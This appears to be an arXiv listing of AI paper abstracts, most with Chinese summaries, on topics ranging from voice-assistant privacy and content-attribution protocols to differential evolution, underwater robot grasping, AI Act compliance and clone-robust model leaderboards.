Abstract:This paper investigates how gender shapes privacy decision-making in youth smart voice assistant (SVA) ecosystems. Using survey data from 469 Canadian youths aged 16-24, we apply multigroup Partial Least Squares Structural Equation Modeling to compare males (N=241) and females (N=174) (total N = 415) across five privacy constructs: Perceived Privacy Risks (PPR), Perceived Privacy Benefits (PPBf), Algorithmic Transparency and Trust (ATT), Privacy Self-Efficacy (PSE), and Privacy Protective Behavior (PPB). Results provide exploratory evidence of gender heterogeneity in selected pathways. The direct effect of PPR on PPB is stronger for males (Male: \beta = 0.424; Female: \beta = 0.233; p 0.1), while the indirect effect of ATT on PPB via PSE is stronger for females (Female: \beta = 0.229; Male: \beta = 0.132; p 0.1). Descriptive analysis of non-binary (N=15) and prefer-not-to-say participants (N=39) shows lower trust and higher perceived risk than the binary groups, motivating future work with adequately powered gender-diverse samples. Overall, the findings provide exploratory evidence that gender may moderate key privacy pathways, supporting more responsive transparency and control interventions for youth SVA use.
[AI-123] Sovereign Context Protocol: An Open Attribution Layer for Human-Generated Content in the Age of Large Language Models
【速读】:该论文旨在解决大型语言模型(Large Language Models, LLMs)在训练和推理过程中大量使用人类生成内容(Human-Generated Content, HGC)时,内容创作者无法被有效识别与溯源的问题。现有方法要么依赖模型内部的梯度信号进行影响追踪(model-internals level),要么通过法律政策手段如透明度要求或版权诉讼实现数据归属(legal-policy level),均缺乏在运行时(runtime)对内容消费行为的实时记录与归因机制。解决方案的关键在于提出主权上下文协议(Sovereign Context Protocol, SCP),这是一个开源协议规范与参考架构,作为LLM与创作者拥有数据之间的可归因数据访问层,确保每次数据访问事件均可被日志记录、授权许可并明确归属。SCP通过定义六项核心功能(包括创作者身份认证、语义搜索、内容检索、可信度/价值评分、真实性验证及访问审计)并支持REST与Anthropic Model Context Protocol (MCP)兼容接口,使归因成为数据访问的默认属性,从而填补当前LLM生态中内容创作价值分配的“归因缺口”(attribution gap)。
链接: https://arxiv.org/abs/2603.27094
作者: Praneel Panchigar,Torlach Rush,Matthew Canabarro
机构: 未知
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 7 pages
Abstract:Large Language Models (LLMs) consume vast quantities of human-generated content for both training and real-time inference, yet the creators of that content remain largely invisible in the value chain. Existing approaches to data attribution operate either at the model-internals level, tracing influence through gradient signals, or at the legal-policy level through transparency mandates and copyright litigation. Neither provides a runtime mechanism for content creators to know when, by whom, and how their work is being consumed. We introduce the Sovereign Context Protocol (SCP), an open-source protocol specification and reference architecture that functions as an attribution-aware data access layer between LLMs and human-generated content. Inspired by Anthropic’s Model Context Protocol (MCP), which standardizes how LLMs connect to tools, SCP standardizes how LLMs connect to creator-owned data, with every access event logged, licensed, and attributable. SCP defines six core methods (creator profiles, semantic search, content retrieval, trust/value scoring, authenticity verification, and access auditing) exposed over both REST and MCP-compatible interfaces. We formalize the protocol’s message envelope, present a threat model with five adversary classes, propose a log-proportional revenue attribution model, and report preliminary latency benchmarks from a reference implementation built on FastAPI, ChromaDB, and NetworkX. We situate SCP within the emerging regulatory landscape, including the EU AI Act’s Article 53 training data transparency requirements and ongoing U.S. copyright litigation, and argue that the attribution gap requires a protocol-level intervention that makes attribution a default property of data access.
[AI-124] RDEx-MOP: Indicator-Guided Reconstructed Differential Evolution for Fixed-Budget Multiobjective Optimization
【速读】:该论文旨在解决约束边界多目标优化(bound-constrained multiobjective optimisation)中如何在有限评估预算下快速收敛至目标区域的问题,而不仅依赖最终的IGD(Inverted Generational Distance)指标。其解决方案的关键在于提出RDEx-MOP算法,该算法融合了基于指标的环境选择(indicator-based environmental selection)、保持种群多样性的Pareto候选集(niche-maintained Pareto-candidate set),以及互补的差分进化算子(complementary differential evolution operators)以平衡探索与开发能力,从而在CEC 2025 MOP基准测试中实现了最优的总得分和平均排名。
链接: https://arxiv.org/abs/2603.27092
作者: Sichen Tao,Yifei Yang,Ruihan Zhao,Kaiyu Wang,Sicheng Liu,Shangce Gao
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI)
备注:
Abstract:Multiobjective optimisation in the CEC 2025 MOP track is evaluated not only by final IGD values but also by how quickly an algorithm reaches the target region under a fixed evaluation budget. This report documents RDEx-MOP, the reconstructed differential evolution variant used in the IEEE CEC 2025 numerical optimisation competition (C06 special session) bound-constrained multiobjective track. RDEx-MOP integrates indicator-based environmental selection, a niche-maintained Pareto-candidate set, and complementary differential evolution operators for exploration and exploitation. We evaluate RDEx-MOP on the official CEC 2025 MOP benchmark using the released checkpoint traces and the median-target U-score framework. Experimental results show that RDEx-MOP achieves the highest total score and the best average rank among all released comparison algorithms, including the earlier RDEx baseline.
[AI-125] RDEx-CSOP: Feasibility-Aware Reconstructed Differential Evolution with Adaptive epsilon-Constraint Ranking
【速读】:该论文旨在解决约束单目标数值优化(Constrained Single-Objective Numerical Optimization)问题,核心挑战在于有限评估预算下同时保证可行解的维持与目标值的强收敛性。解决方案的关键在于提出RDEx-CSOP算法,其创新性融合了三方面机制:基于成功历史的参数自适应(Success-History Parameter Adaptation)、偏向开发的混合搜索策略(Exploitation-Biased Hybrid Search),以及具有时变阈值的ε约束处理机制(ε-Constraint Handling with Time-Varying Threshold)。这种组合使算法在CEC 2025标准测试集上展现出卓越的速度性能和稳健的约束处理能力,最终在U-score框架下的总分和平均排名均优于所有对比算法。
链接: https://arxiv.org/abs/2603.27090
作者: Sichen Tao,Yifei Yang,Ruihan Zhao,Kaiyu Wang,Sicheng Liu,Shangce Gao
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI)
备注:
Abstract:Constrained single-objective numerical optimisation requires both feasibility maintenance and strong objective-value convergence under limited evaluation budgets. This report documents RDEx-CSOP, a constrained differential evolution variant used in the IEEE CEC 2025 numerical optimisation competition (C06 special session). RDEx-CSOP combines success-history parameter adaptation with an exploitation-biased hybrid search and an \epsilon-constraint handling mechanism with a time-varying threshold. We evaluate RDEx-CSOP on the official CEC 2025 CSOP benchmark using the U-score framework (Speed, Accuracy, and Constraint categories). The results show that RDEx-CSOP achieves the highest total score and the best average rank among all released comparison algorithms, mainly through strong speed and competitive constraint-handling performance across the 28 benchmark functions.
[AI-126] RDEx-SOP: Exploitation-Biased Reconstructed Differential Evolution for Fixed-Budget Bound-Constrained Single-Objective Optimization
【速读】:该论文旨在解决边界约束的单目标数值优化问题中,如何在严格评估预算下平衡进化算法的快速收敛性与最终解质量的问题。解决方案的关键在于提出RDEx-SOP算法,其核心创新包括:基于历史成功信息的参数自适应机制、偏向开发(exploitation)的混合分支策略,以及轻量级局部扰动技术,从而有效协调收敛速度与解精度,在IEEE CEC 2025数值优化竞赛的官方基准测试中展现出优异的整体性能和统计上具有竞争力的最终结果。
链接: https://arxiv.org/abs/2603.27089
作者: Sichen Tao,Yifei Yang,Ruihan Zhao,Kaiyu Wang,Sicheng Liu,Shangce Gao
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI)
备注:
Abstract:Bound-constrained single-objective numerical optimisation remains a key benchmark for assessing the robustness and efficiency of evolutionary algorithms. This report documents RDEx-SOP, an exploitation-biased success-history differential evolution variant used in the IEEE CEC 2025 numerical optimisation competition (C06 special session). RDEx-SOP combines success-history parameter adaptation, an exploitation-biased hybrid branch, and lightweight local perturbations to balance fast convergence and final solution quality under a strict evaluation budget. We evaluate RDEx-SOP on the official CEC 2025 SOP benchmark with the U-score framework (Speed and Accuracy categories). Experimental results show that RDEx-SOP achieves strong overall performance and statistically competitive final outcomes across the 29 benchmark functions.
[AI-127] When Verification Hurts: Asymmetric Effects of Multi-Agent Feedback in Logic Proof Tutoring
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在结构化符号领域(如命题逻辑证明)中提供步骤级反馈的可靠性问题,尤其关注其是否能根据学习者的当前证明状态生成精确、有效的指导。解决方案的关键在于构建一个基于知识图谱的基准测试集(knowledge-graph-grounded benchmark),包含516个独特的证明状态及其细粒度标注与难度指标,并设计三种角色专业化管道:Tutor(部分解题访问)、Teacher(完整推导访问)和Judge(验证Tutor反馈)。通过对比不同管道在反馈质量上的表现,研究发现验证机制的效果具有显著依赖性——当上游反馈不可靠时,验证可提升准确率至70%;但当反馈已可靠时,过度规范反而使性能下降4–6个百分点,揭示了复杂度上限(复杂度4–5以上时无模型能稳定成功),从而挑战了“增加验证或更丰富上下文必然改善教学”的假设,推动开发基于难度感知和上游可靠性动态路由的自适应架构。
链接: https://arxiv.org/abs/2603.27076
作者: Tahreem Yasir,Sutapa Dey Tithi,Benyamin Tabarsi,Dmitri Droujkov,Sam Gilson Yasitha Rajapaksha,Xiaoyi Tian,Arun Ramesh,DongKuan(DK)Xu,Tiffany Barnes
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 21 pages, 1 figure
Abstract:Large language models (LLMs) are increasingly used for automated tutoring, but their reliability in structured symbolic domains remains unclear. We study step-level feedback for propositional logic proofs, which require precise symbolic reasoning aligned with a learner’s current proof state. We introduce a knowledge-graph-grounded benchmark of 516 unique proof states with step-level annotations and difficulty metrics. Unlike prior tutoring evaluations that rely on model self-assessment or binary correctness, our framework enables fine-grained analysis of feedback quality against verified solution paths. We evaluate three role-specialized pipelines with varying solution access: Tutor (partial solution access), Teacher (full derivation access), and Judge (verification of Tutor feedback). Our results reveal a striking asymmetry: verification improves outcomes when upstream feedback is error-prone (70% accuracy), but degrades performance by 4-6 percentage points through over-specification when feedback is already reliable (85%). Critically, we identify a shared complexity ceiling; no model or pipeline reliably succeeds on proof states exceeding complexity 4-5. These findings challenge the assumption that adding verifiers or richer context universally improves tutoring, motivating adaptive, difficulty-aware architectures that route problems by estimated complexity and upstream reliability.
[AI-128] Dynamic resource matching in manufacturing using deep reinforcement learning
【速读】:该论文旨在解决制造资源动态匹配问题,即在多期、多对多的场景下,如何高效地将不同类型的需求(demand)与生产能力(capacity)进行逻辑分配,以实现资源利用效率的最大化。该问题具有状态空间和动作空间庞大、需求联合分布难以精确建模等挑战,传统方法面临维数灾难和策略收敛缓慢的问题。解决方案的关键在于引入一种基于领域知识的改进型深度强化学习框架:首先,在Q-learning中引入两类惩罚机制——基于先验策略的领域知识惩罚和满足供需约束的不可行动作惩罚,以提升初始估计准确性并加速收敛;其次,将该改进方法嵌入深度确定性策略梯度(Deep Deterministic Policy Gradient, DDPG)算法,形成领域知识引导的DDPG(Domain Knowledge-informed DDPG, DKDDPG),从而在小规模问题中提供理论收敛保证,并在大规模实验中显著优于传统RL算法,表现出更高的奖励值和更优的时间与训练效率。
链接: https://arxiv.org/abs/2603.27066
作者: Saunak Kumar Panda,Yisha Xiang,Ruiqi Liu
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Optimization and Control (math.OC)
备注: 29 pages, 6 figures, 3 tables; Published in European Journal of Operational Research, Vol. 318(2), 2024
Abstract:Matching plays an important role in the logical allocation of resources across a wide range of industries. The benefits of matching have been increasingly recognized in manufacturing industries. In particular, capacity sharing has received much attention recently. In this paper, we consider the problem of dynamically matching demand-capacity types of manufacturing resources. We formulate the multi-period, many-to-many manufacturing resource-matching problem as a sequential decision process. The formulated manufacturing resource-matching problem involves large state and action spaces, and it is not practical to accurately model the joint distribution of various types of demands. To address the curse of dimensionality and the difficulty of explicitly modeling the transition dynamics, we use a model-free deep reinforcement learning approach to find optimal matching policies. Moreover, to tackle the issue of infeasible actions and slow convergence due to initial biased estimates caused by the maximum operator in Q-learning, we introduce two penalties to the traditional Q-learning algorithm: a domain knowledge-based penalty based on a prior policy and an infeasibility penalty that conforms to the demand-supply constraints. We establish theoretical results on the convergence of our domain knowledge-informed Q-learning providing performance guarantee for small-size problems. For large-size problems, we further inject our modified approach into the deep deterministic policy gradient (DDPG) algorithm, which we refer to as domain knowledge-informed DDPG (DKDDPG). In our computational study, including small- and large-scale experiments, DKDDPG consistently outperformed traditional DDPG and other RL algorithms, yielding higher rewards and demonstrating greater efficiency in time and episodes.
[AI-129] Persona-Based Simulation of Human Opinion at Population Scale
【速读】:该论文旨在解决如何建模个体而非仅预测孤立行为的问题,即构建能够模拟个体在不同情境下如何解释事件、形成观点、做出判断并保持行为一致性的系统。传统方法多依赖人口统计学相关性进行预测,缺乏对个体心理结构的刻画。其解决方案的关键在于提出SPIRIT(Semi-structured Persona Inference and Reasoning for Individualized Trajectories)框架,通过从公开社交媒体文本中推断具有心理学基础的半结构化人格画像(persona),整合结构化属性(如人格特质和世界观信念)与非结构化叙事文本(反映价值观和生活经验),进而驱动生成式AI代理以特定个体身份响应调查或事件,从而实现更真实的人类行为模拟。
链接: https://arxiv.org/abs/2603.27056
作者: Mao Li,Frederick G.Conrad
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:What does it mean to model a person, not merely to predict isolated responses, preferences, or behaviors, but to simulate how an individual interprets events, forms opinions, makes judgments, and acts consistently across contexts? This question matters because social science requires not only observing and predicting human outcomes, but also simulating interventions and their consequences. Although large language models (LLMs) can generate human-like answers, most existing approaches remain predictive, relying on demographic correlations rather than representations of individuals themselves. We introduce SPIRIT (Semi-structured Persona Inference and Reasoning for Individualized Trajectories), a framework designed explicitly for simulation rather than prediction. SPIRIT infers psychologically grounded, semi-structured personas from public social media posts, integrating structured attributes (e.g., personality traits and world beliefs) with unstructured narrative text reflecting values and lived experience. These personas prompt LLM-based agents to act as specific individuals when answering survey questions or responding to events. Using the Ipsos KnowledgePanel, a nationally representative probability sample of U.S. adults, we show that SPIRIT-conditioned simulations recover self-reported responses more faithfully than demographic persona and reproduce human-like heterogeneity in response patterns. We further demonstrate that persona banks can function as virtual respondent panels for studying both stable attitudes and time-sensitive public opinion. Subjects: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Machine Learning (cs.LG) Cite as: arXiv:2603.27056 [cs.CY] (or arXiv:2603.27056v1 [cs.CY] for this version) https://doi.org/10.48550/arXiv.2603.27056 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-130] Multi-Level Barriers to Generative AI Adoption Across Disciplines and Professional Roles in Higher Education
【速读】:该论文旨在解决生成式人工智能(Generative AI)在高等教育机构中跨学科和跨岗位采纳障碍的结构性成因问题,即现有研究多聚焦于个体层面因素(如感知有用性和易用性),而忽视了这些障碍是否由组织结构和制度环境所系统性塑造。其解决方案的关键在于采用多方法混合分析策略——结合多元逻辑回归(MLR)、结构方程建模(SEM)与开放式回答的语义聚类——从而揭示不同学科背景和岗位角色(如非STEM学者、STEM学者及专业服务人员)对GenAI采纳障碍的认知差异,并指出伦理文化与制度治理等结构性因素在其中的核心作用,进而提出大学需构建基于岗位特性的治理与支持框架,而非泛化的培训措施。
链接: https://arxiv.org/abs/2603.27052
作者: Jianhua Yang,Kerem Öge,Adrian von Mühlenen,Abdullah Bilal Akbulut,Tanya Suzanne Carey,Chidi Okorro
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI)
备注: 21 pages, 3 figures, 6 tables
Abstract:Generative Artificial Intelligence (GenAI) is rapidly reshaping higher education, yet barriers to its adoption across different disciplines and institutional roles remain underexplored. Existing literature frequently attributes adoption barriers to individual-level factors such as perceived usefulness and ease of use. This study instead investigates whether such barriers are structurally produced. Drawing on a multi-method survey analysis of 272 academic and professional services (PSs) staff at a Russell Group university, we examine how disciplinary contexts and institutional roles shape perceived barriers. By integrating multinomial logistic regression (MLR), structural equation modelling (SEM), and semantic clustering of open-ended responses, we move beyond descriptive accounts to provide a multi-level explanation of GenAI adoption. Our findings reveal clear, systematic differences: non-STEM academics primarily report ethical and cultural barriers related to academic integrity, whereas STEM and PSs staff disproportionately emphasize institutional, governance, and infrastructure constraints. We conclude that GenAI adoption barriers are deeply embedded in organizational ecosystems and epistemic norms, suggesting that universities must move beyond generalized training to develop role-specific governance and support frameworks.
[AI-131] Unsupervised Behavioral Compression: Learning Low-Dimensional Policy Manifolds through State-Occupancy Matching
【速读】:该论文旨在解决深度强化学习(Deep Reinforcement Learning, DRL)中策略参数空间高维且冗余导致的样本效率低下的问题。现有方法如基于动作的策略压缩(Action-based Policy Compression, APC)依赖即时动作匹配作为重建损失,这种短期代理指标在序列决策中会累积误差,限制了性能提升。解决方案的关键在于提出一种新的占用率驱动的策略压缩(Occupancy-based Policy Compression, OPC),其核心改进包括:(1) 利用信息论中的唯一性度量构建多样化策略数据集,确保策略多样性;(2) 设计一个端到端可微的压缩目标函数,直接最小化真实与重构混合占用分布之间的差异,从而促使生成模型在潜在空间中围绕真正的功能相似性组织结构,实现对多种行为模式的泛化能力,同时保留原始参数空间的表达能力。
链接: https://arxiv.org/abs/2603.27044
作者: Andrea Fraschini,Davide Tenedini,Riccardo Zamboni,Mirco Mutti,Marcello Restelli
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Deep Reinforcement Learning (DRL) is widely recognized as sample-inefficient, a limitation attributable in part to the high dimensionality and substantial functional redundancy inherent to the policy parameter space. A recent framework, which we refer to as Action-based Policy Compression (APC), mitigates this issue by compressing the parameter space \Theta into a low-dimensional latent manifold \mathcal Z using a learned generative mapping g:\mathcal Z \to \Theta . However, its performance is severely constrained by relying on immediate action-matching as a reconstruction loss, a myopic proxy for behavioral similarity that suffers from compounding errors across sequential decisions. To overcome this bottleneck, we introduce Occupancy-based Policy Compression (OPC), which enhances APC by shifting behavior representation from immediate action-matching to long-horizon state-space coverage. Specifically, we propose two principal improvements: (1) we curate the dataset generation with an information-theoretic uniqueness metric that delivers a diverse population of policies; and (2) we propose a fully differentiable compression objective that directly minimizes the divergence between the true and reconstructed mixture occupancy distributions. These modifications force the generative model to organize the latent space around true functional similarity, promoting a latent representation that generalizes over a broad spectrum of behaviors while retaining most of the original parameter space’s expressivity. Finally, we empirically validate the advantages of our contributions across multiple continuous control benchmarks.
[AI-132] UMI-Underwater: Learning Underwater Manipulation without Underwater Teleoperation
【速读】:该论文旨在解决水下机器人抓取任务中因图像质量退化、光照变化及多样示范数据获取成本高昂所带来的挑战。其核心解决方案在于提出一种结合自监督数据收集与跨域迁移学习的框架:首先通过自监督管道自主采集成功的水下抓取示范,其次利用基于深度的可操作性(affordance)表示来桥接陆地与水下域之间的差异,该表示对光照和颜色变化具有鲁棒性;进而将陆地上手持示范训练的可操作性模型零样本(zero-shot)部署至水下场景,再基于几何对齐进行微调,并使用水下示范数据训练一个条件扩散策略(affordance-conditioned diffusion policy)生成控制动作。此方法显著提升了水下抓取性能与背景变化下的鲁棒性,并实现了仅在陆地上见过的物体的泛化能力。
链接: https://arxiv.org/abs/2603.27012
作者: Hao Li,Long Yin Chung,Jack Goler,Ryan Zhang,Xiaochi Xie,Huy Ha,Shuran Song,Mark Cutkosky
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:Underwater robotic grasping is difficult due to degraded, highly variable imagery and the expense of collecting diverse underwater demonstrations. We introduce a system that (i) autonomously collects successful underwater grasp demonstrations via a self-supervised data collection pipeline and (ii) transfers grasp knowledge from on-land human demonstrations through a depth-based affordance representation that bridges the on-land-to-underwater domain gap and is robust to lighting and color shift. An affordance model trained on on-land handheld demonstrations is deployed underwater zero-shot via geometric alignment, and an affordance-conditioned diffusion policy is then trained on underwater demonstrations to generate control actions. In pool experiments, our approach improves grasping performance and robustness to background shifts, and enables generalization to objects seen only in on-land data, outperforming RGB-only baselines. Code, videos, and additional results are available at this https URL.
[AI-133] AutoSiMP: Autonomous Topology Optimization from Natural Language via LLM -Driven Problem Configuration and Adaptive Solver Control
【速读】:该论文旨在解决从自然语言描述的结构问题到可验证二进制拓扑自动转换的闭环问题,即如何在无需人工干预的情况下,将非专业用户输入的文本指令转化为满足多维度质量约束的优化结构设计。其解决方案的关键在于构建一个包含五个模块的自主流程(AutoSiMP):基于大语言模型(LLM)的配置器将自然语言解析为结构参数规范;边界条件生成器输出求解器可用的数据格式;三场密度法拓扑优化求解器结合Heaviside投影与可插拔的连续性控制策略;结构评估器执行八项质量检查(包括连通性、柔度、灰度、体积分数等);以及闭环重试机制确保鲁棒性。实证表明,该系统首次实现了从自然语言输入到合格拓扑输出的全自动化闭环,且在典型基准测试中无需重试即可通过全部质量检查。
链接: https://arxiv.org/abs/2603.27000
作者: Shaoliang Yang,Jun Wang,Yunsheng Wang
机构: 未知
类目: Computational Engineering, Finance, and Science (cs.CE); Artificial Intelligence (cs.AI)
备注: 30 pages, 9 figures
Abstract:We present AutoSiMP, an autonomous pipeline that transforms a natural-language structural problem description into a validated, binary topology without manual configuration. The pipeline comprises five modules: (1) an LLM-based configurator that parses a plain-English prompt into a validated specification of geometry, supports, loads, passive regions, and mesh parameters; (2) a boundary-condition generator producing solver-ready DOF arrays, force vectors, and passive-element masks; (3) a three-field SIMP solver with Heaviside projection and pluggable continuation control; (4) an eight-check structural evaluator (connectivity, compliance, grayness, volume fraction, convergence, plus three informational quality metrics); and (5) a closed-loop retry mechanism. We evaluate on three axes. Configuration accuracy: across 10 diverse problems the configurator produces valid specifications on all cases with a median compliance penalty of +0.3% versus expert ground truth. Controller comparison: on 17 benchmarks with six controllers sharing an identical sharpening tail, the LLM controller achieves the lowest median compliance but 76.5% pass rate, while the deterministic schedule achieves 100% pass rate at only +1.5% higher compliance. End-to-end reliability: with the schedule controller, all LLM-configured problems pass every quality check on the first attempt - no retries needed. Among the systems surveyed in this work (Table 1), AutoSiMP is the first to close the full loop from natural-language problem description to validated structural topology. The complete codebase, all specifications, and an interactive web demo will be released upon journal acceptance.
[AI-134] ransparency as Architecture: Structural Compliance Gaps in EU AI Act Article 50 II
【速读】:该论文旨在解决欧盟《人工智能法案》第50条第二款所规定的生成式AI内容需同时具备人类可读与机器可读的双重透明性要求在实际技术实现中的可行性问题。研究表明,当前生成式AI系统难以通过事后标记(post-hoc labeling)满足这一要求,尤其在事实核查和合成数据生成两大典型场景中,存在三大结构性障碍:缺乏跨平台的混合人机输出标记格式、监管“可靠性”标准与概率模型行为不匹配,以及未针对用户专业背景差异提供适配的披露机制。解决方案的关键在于将透明性视为架构设计的核心要求,而非功能附加项,需融合法律语义学、AI工程与以人为中心的设计开展跨学科研究,以构建从源头支持合规性的系统结构。
链接: https://arxiv.org/abs/2603.26983
作者: Vera Schmitt,Niklas Kruse,Premtim Sahitaj,Julius Schöning
机构: 未知
类目: Artificial Intelligence (cs.AI); Computers and Society (cs.CY); Machine Learning (cs.LG)
备注: 10 pages, 2 figures
Abstract:Art. 50 II of the EU Artificial Intelligence Act mandates dual transparency for AI-generated content: outputs must be labeled in both human-understandable and machine-readable form for automated verification. This requirement, entering into force in August 2026, collides with fundamental constraints of current generative AI systems. Using synthetic data generation and automated fact-checking as diagnostic use cases, we show that compliance cannot be reduced to post-hoc labeling. In fact-checking pipelines, provenance tracking is not feasible under iterative editorial workflows and non-deterministic LLM outputs; moreover, the assistive-function exemption does not apply, as such systems actively assign truth values rather than supporting editorial presentation. In synthetic data generation, persistent dual-mode marking is paradoxical: watermarks surviving human inspection risk being learned as spurious features during training, while marks suited for machine verification are fragile under standard data processing. Across both domains, three structural gaps obstruct compliance: (a) absent cross-platform marking formats for interleaved human-AI outputs; (b) misalignment between the regulation’s ‘reliability’ criterion and probabilistic model behavior; and © missing guidance for adapting disclosures to heterogeneous user expertise. Closing these gaps requires transparency to be treated as an architectural design requirement, demanding interdisciplinary research across legal semantics, AI engineering, and human-centered desi
[AI-135] Compliance-Aware Predictive Process Monitoring: A Neuro-Symbolic Approach
【速读】:该论文旨在解决现有预测性流程监控(predictive process monitoring)方法因缺乏领域特定过程约束(process constraints)而导致的合规性不足与预测准确性低的问题。传统方法为非符号化(sub-symbolic),仅依赖数据学习特征间的相关性,无法显式整合如“手术只能在患者出院一周后才能安排”等先验知识,从而限制了模型的实际适用性和可靠性。解决方案的关键在于提出一种神经符号(neuro-symbolic)方法,利用逻辑张量网络(Logic Tensor Networks, LTNs)将过程知识注入预测模型中,构建包含特征提取、规则提取、知识库创建和知识注入四个阶段的结构化流程,使模型不仅能学习数据模式,还能显式遵守领域规则,从而在保持更高合规性的同时提升预测精度。
链接: https://arxiv.org/abs/2603.26948
作者: Fabrizio De Santis,Gyunam Park,Wil M.P. van der Aalst
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: Accepted CAiSE 2026
Abstract:Existing approaches for predictive process monitoring are sub-symbolic, meaning that they learn correlations between descriptive features and a target feature fully based on data, e.g., predicting the surgical needs of a patient based on historical events and biometrics. However, such approaches fail to incorporate domain-specific process constraints (knowledge), e.g., surgery can only be planned if the patient was released more than a week ago, limiting the adherence to compliance and providing less accurate predictions. In this paper, we present a neuro-symbolic approach for predictive process monitoring, leveraging Logic Tensor Networks (LTNs) to inject process knowledge into predictive models. The proposed approach follows a structured pipeline consisting of four key stages: 1) feature extraction; 2) rule extraction; 3) knowledge base creation; and 4) knowledge injection. Our evaluation shows that, in addition to learning the process constraints, the neuro-symbolic model also achieves better performance, demonstrating higher compliance and improved accuracy compared to baseline approaches across all compliance-aware experiments.
[AI-136] Neuro-Symbolic Learning for Predictive Process Monitoring via Two-Stage Logic Tensor Networks with Rule Pruning PAKDD2026
【速读】:该论文旨在解决现有数据驱动的序列事件预测模型在欺诈检测和医疗监测等场景中,因无法有效融合领域特定的顺序约束与逻辑规则而导致准确率低、合规性差的问题。其解决方案的关键在于提出一种神经符号(neuro-symbolic)方法,通过逻辑网络(Logic Networks, LTNs)将线性时序逻辑(Linear Temporal Logic)和一阶逻辑形式化的控制流、时序及数据载荷知识作为可微分逻辑约束注入模型。创新性地设计了两阶段优化策略:第一阶段使用加权公理损失预训练以优先学习数据特征,第二阶段基于满足度动态进行规则剪枝,仅保留与数据一致且对预测有贡献的逻辑公理,从而在保障领域约束的前提下显著提升模型性能,尤其在合规样本稀缺场景下表现突出。
链接: https://arxiv.org/abs/2603.26944
作者: Fabrizio De Santis,Gyunam Park,Francesco Zanichelli
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: Accepted PAKDD 2026
Abstract:Predictive modeling on sequential event data is critical for fraud detection and healthcare monitoring. Existing data-driven approaches learn correlations from historical data but fail to incorporate domain-specific sequential constraints and logical rules governing event relationships, limiting accuracy and regulatory compliance. For example, healthcare procedures must follow specific sequences, and financial transactions must adhere to compliance rules. We present a neuro-symbolic approach integrating domain knowledge as differentiable logical constraints using Logic Networks (LTNs). We formalize control-flow, temporal, and payload knowledge using Linear Temporal Logic and first-order logic. Our key contribution is a two-stage optimization strategy addressing LTNs’ tendency to satisfy logical formulas at the expense of predictive accuracy. The approach uses weighted axiom loss during pretraining to prioritize data learning, followed by rule pruning that retains only consistent, contributive axioms based on satisfaction dynamics. Evaluation on four real-world event logs shows that domain knowledge injection significantly improves predictive performance, with the two-stage optimization proving essential knowledge (without it, knowledge can severely degrade performance). The approach excels particularly in compliance-constrained scenarios with limited compliant training examples, achieving superior performance compared to purely data-driven baselines while ensuring adherence to domain constraints.
[AI-137] Strategic Candidacy in Generative AI Arenas
【速读】:该论文旨在解决生成式 AI (Generative AI) 模型评估中因模型生产者提交大量克隆模型(即本质上相同的模型变体)而导致排名失真的问题。这种行为可能利用评分系统的随机性,人为提升其最优模型的排名,从而降低排行榜的整体质量和可信度。解决方案的关键在于提出一种新的排序机制——You-Rank-We-Rank (YRWR),该机制要求生产者对其自身提交的模型进行内部排序,并利用这些主观排名来校正基于成对比较的统计估计,从而实现近似抗克隆鲁棒性(approximately clone-robust),即生产者无法通过提交多个克隆模型显著改善其最优模型排名;同时,在生产者能正确排序自身模型的前提下,该机制还能提高整体排名准确性。
链接: https://arxiv.org/abs/2603.26891
作者: Chris Hays,Rachel Li,Bailey Flanigan,Manish Raghavan
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Science and Game Theory (cs.GT)
备注: 43 pages, 5 figures
Abstract:AI arenas, which rank generative models from pairwise preferences of users, are a popular method for measuring the relative performance of models in the course of their organic use. Because rankings are computed from noisy preferences, there is a concern that model producers can exploit this randomness by submitting many models (e.g., multiple variants of essentially the same model) and thereby artificially improve the rank of their top models. This can lead to degradations in the quality, and therefore the usefulness, of the ranking. In this paper, we begin by establishing, both theoretically and in simulations calibrated to data from the platform Arena (formerly LMArena, Chatbot Arena), conditions under which producers can benefit from submitting clones when their goal is to be ranked highly. We then propose a new mechanism for ranking models from pairwise comparisons, called You-Rank-We-Rank (YRWR). It requires that producers submit rankings over their own models and uses these rankings to correct statistical estimates of model quality. We prove that this mechanism is approximately clone-robust, in the sense that a producer cannot improve their rank much by doing anything other than submitting each of their unique models exactly once. Moreover, to the extent that model producers are able to correctly rank their own models, YRWR improves overall ranking accuracy. In further simulations, we show that indeed the mechanism is approximately clone-robust and quantify improvements to ranking accuracy, even under producer misranking.
[AI-138] EZASP – Facilitating the usage of ASP
【速读】:该论文旨在解决初学者在学习和使用答案集编程(Answer Set Programming, ASP)时面临的挑战,尤其是其声明式特性与传统命令式编程的显著差异,以及程序结构自由度高导致的学习门槛问题。解决方案的关键在于提出并实现一个名为EZASP的Visual Studio Code扩展工具,该工具基于Easy ASP方法论,通过限定语言片段、引入结构化编程规范,并提供实时语法错误检测(包括非安全变量识别)、自动代码重排序及可配置性等功能,从而有效支持开发者遵循Easy ASP准则编写程序,提升开发效率与学习体验。
链接: https://arxiv.org/abs/2603.26863
作者: Rafael Martins,Matthias Knorr,Ricardo Gonçalves
机构: 未知
类目: oftware Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注: 12 pages, 1 figure, submitted to ICLP 2026
